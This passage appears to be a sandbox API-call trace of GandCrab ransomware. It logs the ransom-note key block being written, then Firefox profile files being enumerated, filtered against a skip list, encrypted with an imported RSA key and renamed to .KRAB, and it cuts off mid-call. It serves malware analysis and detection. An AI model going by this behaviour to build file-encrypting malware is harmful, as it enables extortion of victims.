KEY---\r\nlAQAAHPTUHGrjb/dcqUrzDS2xomeC8P4CUSPNAOL+0Mo/RbLr0OaWU1FJb00XfFHXj6tOuf3fPEItNktL2VhtINGOMGKEAUgRHIwxSGaKwcSkEjDUL0HUwplREArY2eQK/2FlKmtVxY2cgAjLoWFXtwo2gEK4a1eyVpOdA/5PKA19vmu9D7IWlFZ8M2v2HcmX1WFwMSKKyCPyE3I12HtIyga2yppmGj/0kbeo4Pyss0DfwD9qQhlmbNwHCOobnSofdvP3cINJt0T+mj6E/gguxJb77VutzLS7ATQylX2An2d2MzGDkSiNzUWV0yDTYzmL5WDSsSyVbWoOteqpx5W43Cfpby5H7iD4Mk5vDzBWPVFeBH4GhKSNudNQl6iOb1l4eeUMuEBXGw0+BpkUrUAgQjBWLbJ6CleUr6MmODOH6A7Jhf60sNPZMijoWaqeecabt0KEf7vwtAKjxeXkDnboIObW61GiYye3Y4Tx1l6X4ZFSnOs4j5jePpy6IWD50Buvy4RFZAKh09rDrTVp5PPV5K0wx5ROUVxEFDMbKemGWn2kbJiiMXWKf9il9ecR7Vj6B9X2QxCxUUzPoOCetcS51SFmTzpNC24BpHiYhlhwBirS7mEqg9eHAs2+76DlthH0IYBlLrEZfZyF2GmyxnNSuiRvf66muc7RQYfG3jxGAECcWKNLqKv8fvy6Z8TXe6Wy3TAJ9Bs4xTAPNS0SMF465Ku6H3cEM/+Sga6KajwZhU3AgixnVgyRE321c0dFCBWzWXYlI72JWaaZIHuktcbpqOdgIM0s1zRRiik4jAuC9jbkuK4dcgArE7p/ZEF5efpIhovrn/JleylI8aSPNqecB9NGmRzRYsl1yx7R79uHvMfZXs9u6R7v6sJyePFcv2fFnDq/8LyXgfBE9ECjLuiUlSkGewajMUrZ37SpbSW8OrKVHO/wBgi22J5C1kUjTYx7CQfDqZArf9qjhD5TjMiNMJUTOcANT1k8LdJCX5YnEkqbql9zAKGPD3h85JtJy5d5qZmc1qVDvNq4JgortqMJN+wJ1cbi0dC0ZupdUMXdEyil5EVrOYjd7OcK256OyLJexaPYNoLMT7nNQFQdBAdgxrP1A2j17iR9Rncy0lG27vyzvnlxBJHtN4rzwPyJcWjijdp+tPdfwpkuUhL1s780j4MPPa6ZSqrbN1dVzXyLYpgTfUJlmuliMYsyPoNF0wncUp6xOYOyeuFYcAYzh6kio0hS/OQfq9DULy4jlRsz4upLH/t6I4C2/8Dhtc9am+2z9kXRqxFGT2X4svMmQoZzcM7WuEljG+iZFnGvqeC8n5vHYUfpc5fDXIAr/3POwA8reJF9MuTQQ1Y71BT3fv8E7sTer0XVOuLq5R4mK7sEM2n3/s8Xg1stfLsHdFcp4Hmv7zJXtlAL+R4H9W/nSZPojs1+CA3f3LfcV0a7HpDCnE+3xAWSnFQ2gRJqfwbzuEDyyCVnlyuJ3gtkbgNzq9B1APP/reqFbD0NTG+Qbvjfy1WKWsuD6289ARnmzQdZfMJBKc6RFzabP8o+FTdQ528K5/LT7x00/WeKSnwRm9OwlEw+VgWABWgavtON3e6mnQGl0Ht3WD/SoiTiUQhaoEEUIhq2bMJGacz0QBGGZmiesqKc5BNYY47mlOBt90VgLBU4CrLlcekD1QKjwWIv7VZ/6d9hWbB8r/E0K0I3RLvsz5vWO2nXOYF4tjdvIFwTL7vhZLqD68CF4elxti9nkRp6gejjvBin0GKFE4sn+7ygICF6nm51nbjx2PCS9UqKQVB18bAq1wqNncQG3eriEdZiQnDmTTBJwZ6wxpzlzgiHPxH2MQl59eCy06ZlQ4pRy8AIZxYSs8MjywVkVMf5xfLKSSVC62MPhaeUAB6K7uhE53Kh/oFl2ty6x3FceOAGIk+6qZNV46mVnA0GY1UlOP7S+iVlY0LkPprvD5AwUQwkDA3J2EcOBy5zS0VDHF/IytPJedv/7il5EehJa3AjJJxYGvWERQaYZIUHY/zL8TGo2R8/ZR5MxJqHNldb8Qd8e6doJuxjxiJYrhGVvyhtJA622V6kMSz5u9Zt2BKOap2t+iec6qvzJ66awl54zVCYGCWnYUJ0Gr+HJQiCb+f9SsuUKy0pCXHEtL7hiZI7EOOMD7fkCREB/rydvt9VVgNLaxwvILFzP8c8FdqundPbfSwa3uorXdvHPZwzmxgXTCDqSdOEPl1K4/SIPmI5XHa0B26K6PumAdOtmc=\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0078.876] WriteFile (in: hFile=0x484, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338de20, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338de20*=0x1f6e, lpOverlapped=0x0) returned 1 [0078.877] CloseHandle (hObject=0x484) returned 1 [0078.877] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.878] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0078.878] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x1a, wMilliseconds=0x4e)) [0078.878] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0078.878] GetWindowsDirectoryW (in: lpBuffer=0x3010000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0078.878] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x3010200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x3010600, lpMaximumComponentLength=0x3010608, lpFileSystemFlags=0x3010604, lpFileSystemNameBuffer=0x3010400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x3010600*=0xd2ca4def, lpMaximumComponentLength=0x3010608*=0xff, lpFileSystemFlags=0x3010604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0078.879] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\d2ca4a08d2ca4dee3d.lock") returned 134 [0078.879] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x484 [0078.879] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.880] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.880] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\") returned 111 [0078.880] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\*" [0078.880] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\*", lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 0xffe758 [0078.880] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.880] FindNextFileW (in: hFindFile=0xffe758, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0078.880] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.880] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.880] FindNextFileW (in: hFindFile=0xffe758, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0078.880] lstrcmpW (lpString1="1495592260754.fe0bc3a3-866c-458a-ad46-a730981653d6.main.jsonlz4", lpString2=".") returned 1 [0078.880] lstrcmpW (lpString1="1495592260754.fe0bc3a3-866c-458a-ad46-a730981653d6.main.jsonlz4", lpString2="..") returned 1 [0078.881] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\", lpString2="1495592260754.fe0bc3a3-866c-458a-ad46-a730981653d6.main.jsonlz4" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495592260754.fe0bc3a3-866c-458a-ad46-a730981653d6.main.jsonlz4") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495592260754.fe0bc3a3-866c-458a-ad46-a730981653d6.main.jsonlz4" [0078.881] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0078.881] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495592260754.fe0bc3a3-866c-458a-ad46-a730981653d6.main.jsonlz4.KRAB") returned 179 [0078.881] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495592260754.fe0bc3a3-866c-458a-ad46-a730981653d6.main.jsonlz4") returned 174 [0078.881] lstrlenW (lpString=".jsonlz4") returned 8 [0078.881] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0078.881] wsprintfW (in: param_1=0x3010000, param_2="%s " | out: param_1=".jsonlz4 ") returned 9 [0078.881] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.882] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495592260754.fe0bc3a3-866c-458a-ad46-a730981653d6.main.jsonlz4") returned 174 [0078.882] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495592260754.fe0bc3a3-866c-458a-ad46-a730981653d6.main.jsonlz4") returned 174 [0078.882] lstrcmpiW (lpString1="1495592260754.fe0bc3a3-866c-458a-ad46-a730981653d6.main.jsonlz4", lpString2="desktop.ini") returned -1 [0078.882] lstrcmpiW (lpString1="1495592260754.fe0bc3a3-866c-458a-ad46-a730981653d6.main.jsonlz4", lpString2="autorun.inf") returned -1 [0078.882] lstrcmpiW (lpString1="1495592260754.fe0bc3a3-866c-458a-ad46-a730981653d6.main.jsonlz4", lpString2="ntuser.dat") returned -1 [0078.882] lstrcmpiW (lpString1="1495592260754.fe0bc3a3-866c-458a-ad46-a730981653d6.main.jsonlz4", lpString2="iconcache.db") returned -1 [0078.882] lstrcmpiW (lpString1="1495592260754.fe0bc3a3-866c-458a-ad46-a730981653d6.main.jsonlz4", lpString2="bootsect.bak") returned -1 [0078.882] lstrcmpiW (lpString1="1495592260754.fe0bc3a3-866c-458a-ad46-a730981653d6.main.jsonlz4", lpString2="boot.ini") returned -1 [0078.882] lstrcmpiW (lpString1="1495592260754.fe0bc3a3-866c-458a-ad46-a730981653d6.main.jsonlz4", lpString2="ntuser.dat.log") returned -1 [0078.882] lstrcmpiW (lpString1="1495592260754.fe0bc3a3-866c-458a-ad46-a730981653d6.main.jsonlz4", lpString2="thumbs.db") returned -1 [0078.882] lstrcmpiW (lpString1="1495592260754.fe0bc3a3-866c-458a-ad46-a730981653d6.main.jsonlz4", lpString2="KRAB-DECRYPT.html") returned -1 [0078.882] lstrcmpiW (lpString1="1495592260754.fe0bc3a3-866c-458a-ad46-a730981653d6.main.jsonlz4", lpString2="KRAB-DECRYPT.txt") returned -1 [0078.882] lstrcmpiW (lpString1="1495592260754.fe0bc3a3-866c-458a-ad46-a730981653d6.main.jsonlz4", lpString2="CRAB-DECRYPT.txt") returned -1 [0078.882] lstrcmpiW (lpString1="1495592260754.fe0bc3a3-866c-458a-ad46-a730981653d6.main.jsonlz4", lpString2="ntldr") returned -1 [0078.882] lstrcmpiW (lpString1="1495592260754.fe0bc3a3-866c-458a-ad46-a730981653d6.main.jsonlz4", lpString2="NTDETECT.COM") returned -1 [0078.882] lstrcmpiW (lpString1="1495592260754.fe0bc3a3-866c-458a-ad46-a730981653d6.main.jsonlz4", lpString2="Bootfont.bin") returned -1 [0078.882] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0078.883] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0x1011700) returned 1 [0078.884] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0078.885] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0078.885] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0078.885] CryptGenRandom (in: hProv=0x1011700, dwLen=0x20, pbBuffer=0x338ddcc | out: pbBuffer=0x338ddcc) returned 1 [0078.885] CryptReleaseContext (hProv=0x1011700, dwFlags=0x0) returned 1 [0078.885] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.885] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0x1010ac8) returned 1 [0078.887] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0078.887] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0078.889] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0078.889] CryptGenRandom (in: hProv=0x1010ac8, dwLen=0x8, pbBuffer=0x338ddec | out: pbBuffer=0x338ddec) returned 1 [0078.889] CryptReleaseContext (hProv=0x1010ac8, dwFlags=0x0) returned 1 [0078.889] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.889] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0x1011458) returned 1 [0078.891] CryptImportKey (in: hProv=0x1011458, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0xffe498) returned 1 [0078.891] CryptGetKeyParam (in: hKey=0xffe498, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0078.891] CryptEncrypt (in: hKey=0xffe498, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3010000*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x3010000*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0078.891] GetLastError () returned 0x0 [0078.891] CryptDestroyKey (hKey=0xffe498) returned 1 [0078.891] CryptReleaseContext (hProv=0x1011458, dwFlags=0x0) returned 1 [0078.891] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0x1010930) returned 1 [0078.893] CryptImportKey (in: hProv=0x1010930, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0xffe958) returned 1 [0078.893] CryptGetKeyParam (in: hKey=0xffe958, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0078.893] CryptEncrypt (in: hKey=0xffe958, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3010100*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x3010100*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0078.893] GetLastError () returned 0x0 [0078.893] CryptDestroyKey (hKey=0xffe958) returned 1 [0078.893] CryptReleaseContext (hProv=0x1010930, dwFlags=0x0) returned 1 [0078.893] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495592260754.fe0bc3a3-866c-458a-ad46-a730981653d6.main.jsonlz4" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495592260754.fe0bc3a3-866c-458a-ad46-a730981653d6.main.jsonlz4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7e4 [0078.894] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0078.895] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0078.895] ReadFile (in: hFile=0x7e4, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ddfc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ddfc*=0x162b, lpOverlapped=0x0) returned 1 [0078.976] SetFilePointerEx (in: hFile=0x7e4, liDistanceToMove=0xffffe9d5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.976] WriteFile (in: hFile=0x7e4, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x162b, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ddf8*=0x162b, lpOverlapped=0x0) returned 1 [0078.976] WriteFile (in: hFile=0x7e4, lpBuffer=0x3010000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3010000*, lpNumberOfBytesWritten=0x338ddf8*=0x208, lpOverlapped=0x0) returned 1 [0078.976] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.981] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.981] CloseHandle (hObject=0x7e4) returned 1 [0078.984] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.984] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495592260754.fe0bc3a3-866c-458a-ad46-a730981653d6.main.jsonlz4" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495592260754.fe0bc3a3-866c-458a-ad46-a730981653d6.main.jsonlz4"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495592260754.fe0bc3a3-866c-458a-ad46-a730981653d6.main.jsonlz4.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495592260754.fe0bc3a3-866c-458a-ad46-a730981653d6.main.jsonlz4.krab")) returned 1 [0078.985] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.985] FindNextFileW (in: hFindFile=0xffe758, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0078.985] lstrcmpW (lpString1="1495592289365.f6bd7dec-4421-47ce-b829-1080689ec7ca.main.jsonlz4", lpString2=".") returned 1 [0078.985] lstrcmpW (lpString1="1495592289365.f6bd7dec-4421-47ce-b829-1080689ec7ca.main.jsonlz4", lpString2="..") returned 1 [0078.985] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\", lpString2="1495592289365.f6bd7dec-4421-47ce-b829-1080689ec7ca.main.jsonlz4" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495592289365.f6bd7dec-4421-47ce-b829-1080689ec7ca.main.jsonlz4") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495592289365.f6bd7dec-4421-47ce-b829-1080689ec7ca.main.jsonlz4" [0078.985] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0078.986] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495592289365.f6bd7dec-4421-47ce-b829-1080689ec7ca.main.jsonlz4.KRAB") returned 179 [0078.986] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495592289365.f6bd7dec-4421-47ce-b829-1080689ec7ca.main.jsonlz4") returned 174 [0078.986] lstrlenW (lpString=".jsonlz4") returned 8 [0078.986] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0078.986] wsprintfW (in: param_1=0x3010000, param_2="%s " | out: param_1=".jsonlz4 ") returned 9 [0078.986] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.986] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495592289365.f6bd7dec-4421-47ce-b829-1080689ec7ca.main.jsonlz4") returned 174 [0078.986] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495592289365.f6bd7dec-4421-47ce-b829-1080689ec7ca.main.jsonlz4") returned 174 [0078.987] lstrcmpiW (lpString1="1495592289365.f6bd7dec-4421-47ce-b829-1080689ec7ca.main.jsonlz4", lpString2="desktop.ini") returned -1 [0078.987] lstrcmpiW (lpString1="1495592289365.f6bd7dec-4421-47ce-b829-1080689ec7ca.main.jsonlz4", lpString2="autorun.inf") returned -1 [0078.987] lstrcmpiW (lpString1="1495592289365.f6bd7dec-4421-47ce-b829-1080689ec7ca.main.jsonlz4", lpString2="ntuser.dat") returned -1 [0078.987] lstrcmpiW (lpString1="1495592289365.f6bd7dec-4421-47ce-b829-1080689ec7ca.main.jsonlz4", lpString2="iconcache.db") returned -1 [0078.987] lstrcmpiW (lpString1="1495592289365.f6bd7dec-4421-47ce-b829-1080689ec7ca.main.jsonlz4", lpString2="bootsect.bak") returned -1 [0078.987] lstrcmpiW (lpString1="1495592289365.f6bd7dec-4421-47ce-b829-1080689ec7ca.main.jsonlz4", lpString2="boot.ini") returned -1 [0078.987] lstrcmpiW (lpString1="1495592289365.f6bd7dec-4421-47ce-b829-1080689ec7ca.main.jsonlz4", lpString2="ntuser.dat.log") returned -1 [0078.987] lstrcmpiW (lpString1="1495592289365.f6bd7dec-4421-47ce-b829-1080689ec7ca.main.jsonlz4", lpString2="thumbs.db") returned -1 [0078.987] lstrcmpiW (lpString1="1495592289365.f6bd7dec-4421-47ce-b829-1080689ec7ca.main.jsonlz4", lpString2="KRAB-DECRYPT.html") returned -1 [0078.987] lstrcmpiW (lpString1="1495592289365.f6bd7dec-4421-47ce-b829-1080689ec7ca.main.jsonlz4", lpString2="KRAB-DECRYPT.txt") returned -1 [0078.987] lstrcmpiW (lpString1="1495592289365.f6bd7dec-4421-47ce-b829-1080689ec7ca.main.jsonlz4", lpString2="CRAB-DECRYPT.txt") returned -1 [0078.987] lstrcmpiW (lpString1="1495592289365.f6bd7dec-4421-47ce-b829-1080689ec7ca.main.jsonlz4", lpString2="ntldr") returned -1 [0078.987] lstrcmpiW (lpString1="1495592289365.f6bd7dec-4421-47ce-b829-1080689ec7ca.main.jsonlz4", lpString2="NTDETECT.COM") returned -1 [0078.987] lstrcmpiW (lpString1="1495592289365.f6bd7dec-4421-47ce-b829-1080689ec7ca.main.jsonlz4", lpString2="Bootfont.bin") returned -1 [0078.987] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0078.987] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0x1010bd8) returned 1 [0078.995] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0078.996] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0078.996] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0078.996] CryptGenRandom (in: hProv=0x1010bd8, dwLen=0x20, pbBuffer=0x338ddcc | out: pbBuffer=0x338ddcc) returned 1 [0078.996] CryptReleaseContext (hProv=0x1010bd8, dwFlags=0x0) returned 1 [0078.996] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.996] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0x10113d0) returned 1 [0078.998] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0078.999] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0078.999] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0078.999] CryptGenRandom (in: hProv=0x10113d0, dwLen=0x8, pbBuffer=0x338ddec | out: pbBuffer=0x338ddec) returned 1 [0078.999] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0078.999] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.999] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0x1010ac8) returned 1 [0079.007] CryptImportKey (in: hProv=0x1010ac8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, 